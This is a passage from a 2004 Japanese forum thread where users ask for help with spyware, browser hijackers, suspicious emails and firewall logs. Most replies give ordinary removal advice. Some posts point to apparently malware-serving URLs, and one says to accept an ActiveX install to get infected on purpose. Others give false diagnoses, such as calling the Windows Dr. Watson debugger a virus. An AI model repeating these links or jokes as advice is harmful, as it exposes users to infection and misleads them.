ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALL.FO
名前は違うがシマンテックではDownloader.Trojanで検出される。
ttp://www.symantec.com/region/jp/sarcj/data/d/downloader.trojan.html

これは結構有名どころのスパイウエアじゃなかったけ。
これが見つかったなら、スパイウエアのスキャンしてみた方がいいかも。
スパイウエア駆除関係のソフトや対策は、
ttp://haiiro.info/my/text/template.html

ちなみにTROJ_SMALL.FOはa2でも除去できます。
TROJ_SMALL.KRももしかしたら対応しているかも。
ttp://www.a-2.org/en/

467 :466:04/06/21 06:51
>>465
調べれば調べるほど興味が引かれるスパイウエアですね。推測ですが。

CHM_Psyme.VがインストールされるとTROJ_SMALL.KRは消失する?
ttp://virus.okweb.ne.jp/kotaeru.php3?q=881516
CHM_Psyme.V(キーロガー)との因果関係が深かそう。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CHM_PSYME.V

HijackThisだとこの患者がその症状だったのかも知れない。
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\System32\services\2.01.00.dll (file missing)
O4 - HKLM\..\Run: [xpsystem] C:\Program Files\Windows Media Player\wmplayer.exe
O4 - HKCU\..\Run: [xpsystem] C:\Program Files\Windows Media Player\wmplayer.exe
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - %SystemRoot%\System32\mshtml.dll

逆に情報をもらえて一つ賢くなった。治療法も見つかりそう。ありがとう。

468 :keisicho.go.jp:04/06/21 07:20
こんなメールがきますた。解説おながいします。
---------
ALERT!
A virus was detected in your message.
NAV(Norton Anti Virus)はあなたのメールにウイルスを発見しました。

A virus was NOT removed.
ウイルスの駆除に失敗したため、
配信を拒否しました。
(status = not repaired :未修復)
-----------
送った覚えなど無いのですが。ファイル同封はありませんでした。

469 :名無しさん@お腹いっぱい。:04/06/21 08:28
http://blake.prohosting.com/~fild/cgi-bin/LBCC/lbcc.cgi?

教えてください。
リンクをくりっくすると上記のサイトに飛ばされます。
一体なんでしょうか?

470 :名無しさん@お腹いっぱい。:04/06/21 09:08
>>469
404ってかいてあるじゃないか

471 :名無しさん@お腹いっぱい。:04/06/21 11:15
>>468
・ウィルスに感染していて、ウィルスが勝手にメールを送っている
・擬装アドレスに使われている

どっちか

>>469
ブラクラ対策URLが入ってるんだろ

472 :ななし:04/06/21 15:07
mstask2.exe
といのがプロセスにでたのですがCPU使用率が99%ととかでて・・・・
対策おしえてください!m(_ _)m

473 :名無しさん@お腹いっぱい。:04/06/21 15:28
BlackICEとゆうのをつかってるんですが、そのイベントログに
(サービス不能 (DoS) を引き起こす試みが行われました)
とでるんです。
これは防いだのか、成功されたのかどっちなんですか?
また成功された場合どうゆうことになるんですか?

474 :名無しさん@お腹いっぱい。:04/06/21 15:30
Win98se、ie6、ADSL回線でBUFFALOのBBR-4MGという有線ブロードバンドルータを使っています。
昨日、ウイルスバスター2004のパーソナルファイアウォールログというのを見てみました。
すると4月ぐらいから同じIPからひたすら攻撃?されていました。今もされています。
ルータとウイルスバスターはおそらく初期設定のままです。
私のパソコンに起こっている状況と対処を教えて下さい。
下のような感じです。

475 :名無しさん@お腹いっぱい。:04/06/21 15:31
4月8日のログリストの一部
"種類","時刻","受信/送信","プロトコル","送信元IPアドレス","送信元ポート","送信先IPアドレス","送信先ポート","説明"
"ファイアウォール","14:24:31","受信","UDP","192.168.11.1","33029","239.255.255.250","1900","セキュリティレベル設定によるブロック"
"ファイアウォール","14:24:31","受信","UDP","192.168.11.1","33030","239.255.255.250","1900","セキュリティレベル設定によるブロック"

","14:29:30","受信","UDP","192.168.11.1","33199","239.255.255.250","1900","セキュリティレベル設定によるブロック"
"ファイアウォール","14:29:32","受信","IGMP","192.168.11.1","N/A","224.0.0.1","N/A","セキュリティレベル設定によるブロック"
"ファイアウォール","14:29:39","受信","IGMP","192.168.11.1","N/A","224.0.0.9","N/A","セキュリティレベル設定によるブロック"
"ファイアウォール","14:29:39","受信","IGMP","192.168.11.1","N/A","239.255.255.250","N/A","セキュリティレベル設定によるブロック"
"ファイアウォール","14:30:01","受信","UDP","192.168.11.1","33200","239.255.255.250","1900","セキュリティレベル設定によるブロック"


476 :名無しさん@お腹いっぱい。:04/06/21 15:32
6月20日のログリストの一部
"種類","時刻","受信/送信","プロトコル","送信元IPアドレス","送信元ポート","送信先IPアドレス","送信先ポート","説明"
"ファイアウォール","16:59:17","受信","UDP","192.168.11.1","28818","239.255.255.250","1900","セキュリティレベル設定によるブロック"
"ファイアウォール","16:59:17","受信","UDP","192.168.11.1","28819","239.255.255.250","1900","セキュリティレベル設定によるブロック"
"ファイアウォール","16:59:17","受信","UDP","192.168.11.1","28820","239.255.255.250","1900","セキュリティレベル設定によるブロック"
"ファイアウォール","16:59:17","受信","UDP","192.168.11.1","28821","239.255.255.250","1900","セキュリティレベル設定によるブロック"

477 :名無しさん@お腹いっぱい。:04/06/21 15:34
>>472

まずは>>1に載っているttp://haiiro.info/my/text/template.html
の応急処置をやってみてください。
駄目ならまた相談しましょう

478 :名無しさん@お腹いっぱい。:04/06/21 16:06
>>473
ブロックされたからこそ、ログが残る。
DoSが成功すると、例えばWEBサーバが止まったりする。
詳しくは検索しる。

>>475
UPnPというルータの機能で、攻撃ではない。
98SEはUPnP非対応だったかな?
気になるなら、ルータのUPnPを切ればいい。

479 :475:04/06/21 16:16
>>478
ありがとうございます。ホットしました。


480 :名無しさん@お腹いっぱい。:04/06/21 16:29
Windows XP SP2の日本語版RC2が出たよ

481 :名無しさん@お腹いっぱい。:04/06/21 16:35
>>480
Updateすれば良いの?

482 :名無しさん@お腹いっぱい。:04/06/21 16:42
>>478
安心しました。どうもです。

483 :名無しさん@お腹いっぱい。:04/06/21 17:12
唐突な質問で悪いんだが、おまいらのおすすめなセキュリティーソフトはなんでつか?
(´・ω・`)ウィルスセキュリティ2004買ってボられて欝でつ・・・

484 :名無しさん@お腹いっぱい。:04/06/21 17:18
>>481
ここの記事見てDLしたけどインスコは人柱さんの様子見
ttp://itpro.nikkeibp.co.jp/free/NT/NEWS/20040621/3/

485 :名無しさん@お腹いっぱい。:04/06/21 17:19
実際にWindows XP SP2には,数多くのセキュリティ強化 が施されている。
標準ファイアウオール機能の強化 や,Internet ExplorerやOutlook Expressの
セキュリティ設定 の強化,「セキュリティ・センター」の搭載などである。
しか し,セキュリティ設定が強化されることによって,既存のアプ リケーションがWindows XP SP2で
動作しなくなることも懸念 されている。

486 :名無しさん@お腹いっぱい。:04/06/21 17:21
>>483
おれが使ってるのはバスタ2004+ゾヌ+BlackICE+spybpt+ad-aware

487 :名無しさん@お腹いっぱい。:04/06/21 17:22
Symantec Security checkのウィルス検出について質問があります。
1)使っていいるウィルスデーターベースは、製品版のノートンアンチウィルス
と同じですか?
2)ファイル名がsymantecのサイトに送られるのでしょうか?送られている場合
ウィルス感染しているファイルだけじゃなく、それ以外の正常なファイルのフ
ァイル名も送信されるのでしょうか?
よろしくお願いいたします。


488 :名無しさん@お腹いっぱい。:04/06/21 17:22
>486
dクス。他の人は何使ってるのかな・・・

489 :名無しさん@お腹いっぱい。:04/06/21 17:23
>>483
俺は金ないんで、

Xガード
ttp://xtrm.jp/works/x-guard/

AntiVirR Personal Edition
ttp://www.free-av.com/

spybpt、ad-aware、スパイウェァブラスターです。

490 :名無しさん@お腹いっぱい。:04/06/21 17:55
>>483
eTrust, ZoneAlarm, Ad-aware

NIS2002にやられた口でつ

491 :keisicho.go.jp:04/06/21 18:37
>>471

>>468です。ご教示ありがとうございました。オンラインスキャンではウィルスの類は
出ませんでしたので、騙られたか、あのメール自身がイタズラだったのかも
しれません。同封ファイルには気をつけろぐらいの知識しかありませんので
とても不安になりましたが・・・。

492 :名無しさん@お腹いっぱい。:04/06/21 20:52
>>481
ゾヌ+AVG+Spybot+SpywareBlaster+Ad-aware+a2

493 :名無しさん@お腹いっぱい。:04/06/21 20:56
>>492
a2が分からん

494 :名無しさん@お腹いっぱい。:04/06/21 21:01
最近 a2 社員 or 信者が各所に出没中…

495 :ガイシュツとは思いますがいちおうコピペしておく:04/06/21 21:07
Windows XP SP2 RC 日本語版 キタ━(゚∀゚)━!!!!
http://download.microsoft.com/download/6/F/5/6F5F8356-9C43-4413-B67D-CE77CE6E3444/xpSP2.exe

セキュリティセンターという新機能など、セキュが画期的に強化
されたそうです。

496 :名無しさん@お腹いっぱい。:04/06/21 21:07
オレもa2入れてるけど検出実績ゼロだ

497 :名無しさん@お腹いっぱい。:04/06/21 21:11
>>496
a2って何?他は全部分かるのだが。
フリーソフトじゃないの?

498 :名無しさん@お腹いっぱい。:04/06/21 21:12
>>490
常駐はルータ+AVG
たまにSpyBot
で、十分。

499 :名無しさん@お腹いっぱい。:04/06/21 21:22
a2
malwarer(トロイ中心)専用
http://www.emsisoft.com/en/
フリーだよ

専用スレもこっそりある
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/

500 :名無しさん@お腹いっぱい。:04/06/21 21:31
>>499
どもです。やっと分かりました。


501 :名無しさん@お腹いっぱい。:04/06/21 21:52
スパイウエアの予防としてはこれも使える。

IE-SPYAD
ttp://www.staff.uiuc.edu/~ehowes/resource.htm
IE-SPYAD導入の手引き(日本語解説ページ)
ttp://www.geocities.jp/ie_spyad_japanese_manual/index.html

制限付きサイトへ登録 IE-SPYAD(専用スレ)
http://pc5.2ch.net/test/read.cgi/sec/1076041687/

502 :名無しさん@お腹いっぱい。:04/06/21 22:05
>>483
avast!+BitDefender+Spybot+SpywareBlaster+Ad-aware

503 :初心者です:04/06/21 22:17
どこかのホームページに行った時からメインのホームページがabout:blank
となります。インターネットオプションでヤフーにホームページ設定をして
もなおりません。誰か修正方法教えてください

504 :名無しさん@お腹いっぱい。:04/06/21 22:21
>>503
ttp://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

逝って来い

505 :名無しさん@お腹いっぱい。:04/06/21 22:21
>>503
ttp://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html

ここを読んで分からなかったらまた聞いてください。

506 :名無しさん@お腹いっぱい。:04/06/21 22:22
>>505
かぶっちまった。すまん。

507 :初心者です:04/06/21 22:28
ありがとうございます。



508 :名無しさん@お腹いっぱい。:04/06/21 22:42
HomeSearchAssistant
とか
ShoppingWizard
ってどこに逝けば感染する?


ttp://gb.bbs.ws/book.phpは勘弁して(リダイレクト大杉)

509 :初心者です :04/06/21 23:09
やっぱりだめです。
電気屋に持っていってみます。

510 :名無しさん@お腹いっぱい。:04/06/21 23:13
>>509
大したデータが入っていないなら、フォーマットして
自分で再インストールする方法もあるよ。

511 :初心者です:04/06/21 23:16
>>510
やってみます。


512 :名無しさん@お腹いっぱい。:04/06/21 23:27
「about:blank Search for型」の対処法で

右クリックが出来ないのですが対処法はありますか?

513 :困ったさん:04/06/21 23:30
みません。どうしても教えてほしいことがあります。
ケイタイから、ある掲示板に書き込みをしたのですが、どうやらそれを誰かが何かの手段を使ってメールアドレスを読み取り、変なメールを送ってきました。この場合、自分のメールアドレスを変えたほうがいいのでしょうか?
あ、変なメールというのは、送信者のところに、自分のアドレスがきているメールのことです。まるで、自分にメールを送ったようになっていました。


514 :困ったさん:04/06/21 23:31
ごめんなさい。みませんじゃなくてすみませんです。ミスりました。

515 :名無しさん@お腹いっぱい。:04/06/21 23:32
>>513
携帯のメールアドレスを読み取る事はできません。
が、変なメールがイヤならばアドレスを変えるのが常套手段です。

516 :名無しさん@お腹いっぱい。:04/06/21 23:33
>>512
IEなら上の方の「表示」から「ソース」の表示で駄目ですか?

517 :512:04/06/21 23:36
>>516
できました。ありがとうございます

518 :困ったさん:04/06/21 23:46
<<515
ありがとうございます

519 :463:04/06/21 23:51
>>466
大変遅れましたが・・ありがとうございます。
466氏に紹介していただいた、スパイウェア駆除のソフトのURLに飛び、
Ad-aware 6.0をインストール、スキャンしたところ、新たに50いくつのスパイウェアが見つかりました。
それを全て消すと、Windows起動後、いきなり出てくるChintcai(その他)の消えないエンドレスメッセージが、
出てこなくなりました。
ありがとうございました。

しかし・・、起動後の上記の状態はなくなったのですが、
未だにウィルスバスターのリアルタイム検索で、
ウィルスが勝手にPC上に現れてるんですが・・・
最近使い始めたのですが、こういうのは普通なのか、
まだ悪質サイトからウィルスを勝手にDLするウィルスがまだ存在しているのか・・・
だとしたら、これはTROJ_SMALL.FOの特徴でその活動ですよね?
もうこの前にすぐに消したし、
他のを、Srybot、Ad-aware 6.0、ウィルスバスター、で全て検索しましたが、
やはり、もうウィルスやスパイウェアは完全に消えてます。
これは・・どうなんでしょう?

520 :困ったさん:04/06/21 23:56
またまたすみません。
他人に自分のケイタイのメールアドレスを知ることによって起こる悪いことってなんですか?
やっぱり、メアドから住所とか、電話番号とかもわかってしまうのでしょうか?

521 :困ったさん:04/06/21 23:58
またミスりました・・・。他人にじゃなくて他人がです。本当にすみません

522 :名無しさん@お腹いっぱい。:04/06/22 00:00
>>520
迷惑メールを送られるとか。
住所、電話はわからない。

523 :名無しさん@お腹いっぱい。:04/06/22 00:02
ネットに接続したときに勝手に何か送信されるのを
防止したり監視したりしたいのですが
バスターと一緒に使っても問題ないもので、オススメのソフト教えてください。
宜しくお願いします。

524 :名無しさん@お腹いっぱい。:04/06/22 00:08
>>519
>未だにウィルスバスターのリアルタイム検索で、
>ウィルスが勝手にPC上に現れてるんですが・・・
>最近使い始めたのですが、こういうのは普通なのか、
普通ではありません。(そんなのが普通だったら怖すぎます。)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALL.FO&VSect=T
TROJ_SMALL.FOですか?TEMP フォルダ内にXWXLOAD.EXEがまだあるか要確認って書いてありますね。

525 :名無しさん@お腹いっぱい。:04/06/22 00:09
>>523
「ファイアウォール」で検索を。

526 :名無しさん@お腹いっぱい。:04/06/22 00:13
>>523
ファイアウォールとその監視ログの事を言ってるのかなと思うが、
俺はノートン+ルータ設定なんで、バスターもFWも知らん。
すまんね検索してくれ。

527 :困ったさん:04/06/22 00:28
ありがとうございました

528 :名無しさん@お腹いっぱい。:04/06/22 01:09
>>524
C:\Windows\Temp のフォルダ内ですよね?
ファイル名がXWXLOAD.EXEであるなら、なかったんですが・・・
別のファイル名なんですか?

529 :名無しさん@お腹いっぱい。:04/06/22 01:24
>>528
情報を小だしにしないで、
リアルタイムで検出されるウイルス名を書いたり、
今どういった状態なのか、気が付いた点などを書いてもらえると
もう少し対策や対応策がもらえるかも知れない。

信者ではないがa2はそれ系のトロイに強いのでお勧めしとく。
ttp://www.emsisoft.com/en/

530 :名無しさん@お腹いっぱい。:04/06/22 01:38

ALL YOU DO WITH COMPUTER IS STORED FOREVER IN YOUR HARD DISK.
WHEN YOU VISIT SITES, SEND EMAILS... ALL YOUR ACTIONS ARE LOGGED.
AND IT IS IMPOSSIBLE TO REMOVE THEM WITH STANDARD TOOLS.
YOUR DATA IS STILL AVAILABLE FOR FORENSICS. AND IN SOME CASES FOR YOUR BOSS, YOUR FRIENDS, YOUR WIFE, YOUR CHILDREN.

Every site you or somebody or even something, like spyware,
opened in your browser, with all images, and all downloaded and maybe later removed movies or mp3 songs - ARE STILL THERE and could broke your life!


SECURE YOURSELF RIGHT NOW!

Removal instructions

あるURLを踏んでしまてデスクットップにこのような画像が出てきたんですけど
一応バスターとアンチスパイウイルスはやって駆除したんですけどコレが直りません
どうしたらよいのでしょうか?

531 :名無しさん@お腹いっぱい。:04/06/22 01:44
>>530
OS、ウイルス名をどうぞ。

532 :名無しさん@お腹いっぱい。:04/06/22 01:51
XPです
ウイルスの種類はわからないです
IEは正常に戻りましたが・・・

533 :名無しさん@お腹いっぱい。:04/06/22 02:05
>>530
ALL YOU DO WITH COMPUTER IS STORED FOREVER IN YOUR HARD DISK.
という文字でググった。
ttp://www.okweb.ne.jp/kotaeru.php3?q=894973

534 :名無しさん@お腹いっぱい。:04/06/22 02:10
>>533
ありがとうございますコレで何とかなりそうです!

535 :名無しさん@お腹いっぱい。:04/06/22 02:20
>>129 >>155氏と同様の症状になり、セーフモードで立ち上げて、
「Ad-aware」「Spy-bot」「CWShredder」等のツールでスパイウェアを駆逐し
デスクトップの復元、IEの復元までは出来たのですが、OSを立ち上げるとしばらくして
「180 search assistant alert」という窓が多重に開くようになりました。

オンラインウイルススキャンでも感染は見つからなかったのですが、
インストールされているプログラムの一覧に
「AdWare & SpyWare」という怪しいものがあり、削除しようとすると
ttp://www.adwareremovergold.com/?revid=31418&s=1(怪しいので踏まないで下さい)
にアクセスしようとして、削除することができません。
システムの復元が出来れば簡単だったのですが、復元ポイントを設定してなかったため
それも出来ません。

どうすれば復旧することができるでしょうか?

536 :535:04/06/22 02:22
すいません、OSはXP Home SP1で、IE6 SP1使用です。

537 :名無しさん@お腹いっぱい。:04/06/22 02:23
>>535
素直に再インストール。

538 :名無しさん@お腹いっぱい。:04/06/22 02:32
>>535
同じ症状の患者のログを見て解決の糸口を探ってみて下さい。
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=all&namber=30356&type=0&space=0&no=0

539 :名無しさん@お腹いっぱい。:04/06/22 06:28
会社でホットメール使って、思い切り個人情報や会社のヤバイ話なんかも
どんどんしていますが、それって会社に読まれてしまうんですか?
削除すれば大丈夫ですか?

540 :名無しさん@お腹いっぱい。:04/06/22 06:58
>>539
たぶん杞憂だろうと思うけど、言い訳が必要な行動は慎むに越した事はない。
もし読まれてれば、流れてる時点で読まれてるだろうから、今更削除しても手遅れ。

541 :名無しさん@お腹いっぱい。:04/06/22 08:27
すいません、誰か教えて下さい…

家族がBit Torrentというソフトを勝手にインストールしてしまいました。
ネット上の何かを見ようとしたらしいんですが…
危ないソフトらしいとだけ知人に聞いて
自分がコントロールパネルの「追加と削除」でアンインストールしました。

これで完全にアンインストールはできているでしょうか?
またこのソフトをインストールすると何が危ないのでしょうか?
Bit Torrentでググってみましたがダウンロードどうこうでチンプンカンプンです。

どうかアドバイスを頂けないでしょうか。お願いします…
OSは2000です。

542 :名無しさん@お腹いっぱい。:04/06/22 08:49
危なくないけどな

543 :名無しさん@お腹いっぱい。:04/06/22 08:49
>>541
>またこのソフトをインストールすると何が危ないのでしょうか?
ある朝突然、京都府警が来るかも(w

544 :名無しさん@お腹いっぱい。:04/06/22 09:27
541です。
>>542-543
おはようございます。
個人情報や仕事の文書がパソコンに入っていたのですが大丈夫でしょうか?
またアンインストール出来ているかお教え頂けないでしょうか…


545 :名無しさん@お腹いっぱい。:04/06/22 09:41
そっちは大丈夫。幼女動画の方は・・・

546 :名無しさん@お腹いっぱい。:04/06/22 09:48
アンインストールできてないかどうか不安なら。とっととリカバリしなさいよ。
情報は流出してるとすれば戻らないから、それはあきらめる方向で。
(流出してれば、だけどね)


547 :名無しさん@お腹いっぱい。:04/06/22 09:50
>>544
家族がインストールしたといのが正直問題だなと思う。
その人があなたにとって、兄弟なのか、だんななのか、奥さんなのか、
はたまた息子や娘さんなのかは分からないが、
個人情報や仕事の文書の入ったパソコンの書類の流出は、
当の本人に何に使ったにか?などを最終的には問いただすしかないと思う。
本当のことを話すとは>>541の時点でないと思いますが。

アンインストールは出来ていると思いますよ。

548 :名無しさん@お腹いっぱい。:04/06/22 10:02
はじめまして。詳しい方にお尋ねします。
LANの設定を変えられてしまい困っています。
勝手にプロキシ接続になります。串の板から誘導して頂きました。
環境は ペンV ME acca OCN モデムは富士通のV1です。

ウイルスは発見されていません。
スパイウエアという物なのでしょうか。
スパイウエアの駆除が英語いっぱいで判りかねます。
このままだと、何か起きるのでしょうか?


549 :名無しさん@お腹いっぱい。:04/06/22 10:10
>>548
> スパイウエアという物なのでしょうか。
しょうか?言われましても。

> スパイウエアの駆除が英語いっぱいで判りかねます。
中学生なら辞書引け。分からないところは貼れ。

> このままだと、何か起きるのでしょうか?
スパイウエアの名前くらい書かないと分かるわけないっしょ。

550 :名無しさん@お腹いっぱい。:04/06/22 14:21
Ad-aware 6.0という物をインストしてスキャンを書けたところ
やはり、何かが入っていたみたいです。
駆除はこの方法で宜しいのでしょうか。
今後すべき事は何でしょうか。

551 :名無しさん@お腹いっぱい。:04/06/22 14:26
>>550
>>549

552 :名無しさん@お腹いっぱい。:04/06/22 14:55
>>548
3日後にPCが

553 :名無しさん@お腹いっぱい。:04/06/22 15:16
>>550
とりあえずここへ行ってみる。
ttp://higaitaisaku.web.infoseek.co.jp/

駆除はad-awareだけではなく、症状に応じていろいろなツールが必要。
がんばってください。

554 :名無しさん@お腹いっぱい。:04/06/22 15:23
>>553
ありがとうございます^^
しかし、又、今串が刺さっておりスキャンした所
objects rekognized に1つ出てきてしまいました。
一体(w

555 :名無しさん@お腹いっぱい。:04/06/22 15:25
ライブカメラをしたいのですがポートの開け方がわかりません。
OSはWIN2000
ケーブル回線
モデムは Fujikuraの Cable Modem FCM-140C
ルータは FUJITSU LIMITED ワイヤレスブロードバンドルータ FMWBR-101

を使用しています。ファイアーウォール等・無
よろしくお願いします。スレ違いならどこへ行けばいいのか教えてください。

556 :名無しさん@お腹いっぱい。:04/06/22 15:41
>>555
ソフトウエアのマニュアルにどのポート使うか必ず書いてあるはず。
じゃなきゃ使えないもんね。

557 :550:04/06/22 15:42
実は、2ちゃんの壷をダウンしてから様子がおかしかったのですが・・・
原因はつぼでした。つぼを開けると1つウエアが出てくる・・
繰り返し試してみたので間違いありません。
これは、壷に故意に付けられたと言うことですか?
もう、ダウンしない方が良いのでしょうか。
他に壷使っていらっしゃる方、大丈夫な方もいらっしゃるのでしょうか。。

558 :名無しさん@お腹いっぱい。:04/06/22 15:51
>>556
ポートもわかってないと思うが、ポートがわかったところで
ルータの設定が出来ないのだと思われ。

559 :名無しさん@お腹いっぱい。:04/06/22 16:10
>>557
お前>>548だろ
壺使うなら使い方くらい読め
http://tubo.80.kg/step2.html

560 :名無しさん@お腹いっぱい。:04/06/22 17:05
キーボードに触れてもないのに(もちろん何も載っていない)、
「****************************************〜」というように
「*」が勝手に入力されることが時々あるんだけど、これって
なにかのウィルスでしょうか?
avast!とANTIDOTE SuperLiteでチェックしましたがウィルスは見つかりません
でした。

561 :名無しさん@お腹いっぱい。:04/06/22 17:06
>>560
キーボードの故障じゃないの?接触とか確認してみたら?

562 :560:04/06/22 17:14
>>561
レスありがとうございます。
PS/2コネクタを何度か抜き差ししてみましたが直りませんでした。
新しいキーボードを買ってくるまえに、他の原因は何か考えられますで
しょうか?

563 :名無しさん@お腹いっぱい。:04/06/22 17:18
>>592
βακα..._〆(゚▽゚*)

*キーを取ってみろ

564 :名無しさん@お腹いっぱい。:04/06/22 17:19
>>562
分解掃除。特に * の周り。自信ないなら外からドライヤーの冷風。
(完全にスレ違いは笑う)

565 :560:04/06/22 17:25
>>563>>564
ありがとうございます。
分解掃除ですか・・・。考えもしませんでした。
ちょっと勇気がいりますが、やってみます。
スレ違いな質問になってしまい申し訳ありませんでした。***

566 :名無しさん@お腹いっぱい。:04/06/22 17:27
最近、いきなりFDドライブが動き出すんですが、
なぜなんでしょうか?よろしければ教えてください。

567 :名無しさん@お腹いっぱい。:04/06/22 17:29
>>566
ウィルスです

568 :あにき:04/06/22 17:30
呪いのフロッピーディスクドライブ


569 :名無しさん@お腹いっぱい。:04/06/22 17:30
>>567
ウイルスなんですか?
pandaのオンラインスキャンやノートンでも見つからなかったんですが・・・

570 :名無しさん@お腹いっぱい。:04/06/22 17:32
>>566
えっと、その異常がウイルス、スパイウェアによるものなのか、メカニカルな
問題なのかを調べてくださいな。→オンラインスキャン。

571 :初心者:04/06/22 17:33
うちのパソコンもFDアクセス後に
勝手に見に行くぞ。


572 :名無しさん@お腹いっぱい。:04/06/22 17:33
>>570
わかりました。今から調べてみます。

573 :名無しさん@お腹いっぱい。:04/06/22 17:38
PC初心者のぼるじょあいないよー

574 :名無しさん@お腹いっぱい。:04/06/22 17:43
>>571
アクセス後に何を見に行くの?

575 : :04/06/22 17:43
about blank search for型 とやらに感染したいのですが、何処に行けばもらえますか?

576 :るぅりん☆6歳 ◆IAc6UigumM :04/06/22 17:45
>>575
意味不明みゅ☆

c:\varx.chm
c:\varx.exe
を削除してから何かしらやれみゅ☆


577 :560:04/06/22 17:46
キー取ったけどなおりませんでした。
新しいキーボード買ってきます。(´・ω・`)
**************************************************
放っとくと↑こんなかんじです。

578 :名無しさん@お腹いっぱい。:04/06/22 17:48
>>577
新しいの買うなら、丸洗い+ドライヤーも試す価値あり。

579 :名無しさん@お腹いっぱい。:04/06/22 17:49
>>577
300円で売ってるもんな。

580 :名無しさん@お腹いっぱい。:04/06/22 17:51
>>575
http://gb.bbs.ws/book.php?book=xtrime
ActiveXコントロールのインストール確認画面が表示されたら、はい、をクリックする事。

581 :575:04/06/22 17:51
>>576
どっかのエロサイトでアクティブX経由でもらえるスパイウェアなんだが。
そんな素敵サイトしりませんか?

582 :名無しさん@お腹いっぱい。:04/06/22 17:54
>>577
エチルアルコールをスプレーで吹き付けろ。
滴るぐらいやってもいい。

583 :575:04/06/22 17:55
>>580
ありがとう、逝ってきまつ

584 :名無しさん@お腹いっぱい。:04/06/22 17:57
>>583
感染後の感想も希望、達者でなあ

585 :560:04/06/22 18:04
レス本当にありがとうございます。
でも考えてみたら自分の使ってるキーボ−ドはコンパクトタイプなので
shiftを押さないと「*」が打てないんですが、なんでなんだろ?
ってスレ違いですよね。皆さん本当にありがとうございました。

586 :名無しさん@お腹いっぱい。:04/06/22 18:09
>>585
普通だよ。

587 :550:04/06/22 18:14
>>559
はいそうです。
串の件はわかるのですが・・
スパイウエアとして感知されるのも当たり前なのでしょうか。

588 :名無しさん@お腹いっぱい。:04/06/22 18:52
>>580
tp://x.full-tgp.net/?ms.com
tp://81.211.105.37/579/
tp://pizdato.biz/acc1/new/index.html


589 :名無しさん@お腹いっぱい。:04/06/22 19:05
>>575
OSがMEやXPの場合、システムの復元をすると直る可能性があるので試してみて。

590 :名無しさん@お腹いっぱい。:04/06/22 19:20
さっきからnortonが送信メールのスキャンを連発してるんですが
一体なんなんでしょうか?

591 :名無しさん@お腹いっぱい。:04/06/22 19:23
nyをやっててもやってなくても
開けてるポートにやたらアタックがくるんですが
これは普通なんですか?


592 :名無しさん@お腹いっぱい。:04/06/22 19:26
お前がnyを起動してるのかしてないのか、他のnyユーザーがわかるわけないだろ

593 :drwtsn32.exe:04/06/22 19:27
Win2000を使っているのですが、時々、原因不明のエラーでエクスプローラーが落ち不安定になります。
タスクマネージャーで確認すると drwtsn32.exe という見慣れないものが追加されており、これを
削除すると普通どおりに戻ります。これはいったい何でしょうか?

594 :シャーロック・ホームズ:04/06/22 19:55
>>593
ワトソン君、わからないのかね。

595 :名無しさん@お腹いっぱい。:04/06/22 20:01
>>593
普段あんまりお見かけしないからなぁ。
ttp://support.microsoft.com/default.aspx?scid=/directory/worldwide/ja/Kblight/T006/2/09.asp


596 :名無しさん@お腹いっぱい。:04/06/22 20:03
>>593
それウィルスだよ


>>594-595
Win3.1から入ってるのにね〜

597 :名無しさん@お腹いっぱい。:04/06/22 20:37
>>592
どうもです

こっちが起動してなくても
他のnyユーザーがつなぎにきてるってことですか?
それとも
nyは関係なくてポートスキャンでもかけられてるってことですか?




598 :名無しさん@お腹いっぱい。:04/06/22 21:17
>>597
・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。

599 :名無しさん@お腹いっぱい。:04/06/22 22:02
2chでリモホが表示されるスレからIPが知られてしまいました。
IPの表示されないスレでも 以後付きまとい行為をされています。
一行レスしかもsageと書いただけなので文の癖などでは書き込み人の割り出しは出来ません

掲示板によっては表示からソースを選択するとリモホやIPがわかると知りましたが
2chでは無理な様子。IPがわかればどこにいるなんてことは簡単にわかるのでしょうか?
(宝島社の猫科の大型獣がCG化された雑誌には色々書いてありましたので)

600 :名無しさん@お腹いっぱい。:04/06/22 22:26
あるサイト(エロサイトではありません)でリンクを踏んだところ
ノートンが「windowsサブシステムがネットに接続しようとしています許可しますか?」
と警告を出しました。とりあえず「遮断」を選択しておきましたが、これは一体なんなんでしょうか?
OSはXP。ノートンは2003です。

601 :名無しさん@お腹いっぱい。:04/06/22 22:37
>>600
なんでしょうったってそれだけでわかるわけない。javascriptが何か
悪プログラムをダウンロードしに行ったのかも。最近はウィルスより
スパイやブラウザハイジャッカーの被害のほうが深刻。

エロサイト見てたら…助けてください! part29
http://pc6.2ch.net/test/read.cgi/pcqa/1087573951/424

602 :名無しさん@お腹いっぱい。:04/06/22 23:02
ウインドウズのXPなんですけど
システムの復元ウィザードってどこから立ち上げるんですか?

603 :名無しさん@お腹いっぱい。:04/06/22 23:08
>>602
こちらで質問して
http://pc6.2ch.net/test/read.cgi/pcqa/1087899636/l50

604 :名無しさん@お腹いっぱい。:04/06/22 23:09
>>602
スタート→ヘルプとサポート→コンピュータへの変更をシステムの復元で元に戻す

605 :名無しさん@お腹いっぱい。:04/06/22 23:12
>>602
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

 復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
 で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりに注意。また復元
 ポイントは日付の古いほうから順に消えていきます。正常なポイントがどれだったか
 紙にメモ取るなりして管理しときましょう。

ここら見て勉強しておきましょう。「エロサイト見てたら…助けてください!」
http://pc6.2ch.net/test/read.cgi/pcqa/1087573951/
まとめサイト
http://haiiro.info/my/text/template.html#11

606 :名無しさん@お腹いっぱい。:04/06/22 23:15
>>605
補足サンクス。私クラシックにしてた。ごめん>>602

607 :539:04/06/22 23:31
昨日限りでホットメールで、チョー個人的内容や会社の内部事情や悪口など
ヤバイ内容のやり取りは止めました。
過去にホットメールでやり取りした中で、調子に乗って友達に
